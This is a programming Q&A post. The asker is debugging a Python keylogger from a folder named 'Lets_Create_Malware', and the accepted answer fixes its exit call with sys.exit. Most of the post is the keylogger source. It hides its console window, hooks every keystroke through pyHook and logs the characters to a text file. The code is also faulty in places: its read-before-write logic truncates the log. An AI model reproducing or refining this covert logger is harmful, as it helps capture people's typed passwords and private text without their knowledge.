# Errors with python even though I included libraries

Tags: python, file, exit, read-write

I have Python code based on [YouTube video](https://www.youtube.com/watch?v=5xy9w9-hzrs)

When I enter Ctrl-E to exit, I get error `Traceback (most recent call last):
  File "C:\Python27\lib\site-packages\pyHook\HookManager.py", line 351, in KeyboardSwitch
    return func(event)
  File "C:/Lets_Create_Malware/keyz.pyw", line 21, in OnKeyboardEvent
    _exit(1)
NameError: global name '_exit' is not defined` even though I included sys library.

I am going nuts over this. Here is my documented code. Any help is most appreciated.

```
import win32api #win32* to interact with Windows environment
import win32console
import win32gui

import pythoncom #python to interact with windows
import pyHook #captures input, such as from a keyboard

import sys #use system-specific parameters such as _exit
import logging #enables logging


#hide python command window  
win = win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)

#exit script that uses ASCII value 5 to end program
#ASCII value 5 is same as Ctrl-E
#OnKeyboardEvent is invoked with key on keyboard is pressed
def OnKeyboardEvent(event):
    if event.Ascii == 5:
        _exit(1)

    #if input is not null or backspace, record input
    if event.Ascii != 5:

        #open read-only copy of log file and save to variable buffer
        f=open('c:\\Lets_Create_Malware\\output.txt', 'w+')
        buffer=f.read()
        f.close

        #re-open log file, this time you can write to it
        f=open('c:\\Lets_Create_Malware\\output.txt','w')

        #save all log information as variable keylogs
        keylogs=chr(event.Ascii)



        #append variable keylogs to variable buffer
        buffer += keylogs

        #write buffer to the writable logfile, C:\output.txt
        f.write(buffer)

        #close the logfile
        f.close()

#create hook manager
hm = pyHook.HookManager()

#watch for all key events
hm.KeyDown = OnKeyboardEvent

#set the hook that captures all the events
hm.HookKeyboard()

#record the events
pythoncom.PumpMessages()
```

Answer (score 2, accepted):

To use an imported module in python you must call the method from the module as `module.method` so you should have `sys.exit(1)` not `_exit(1)`.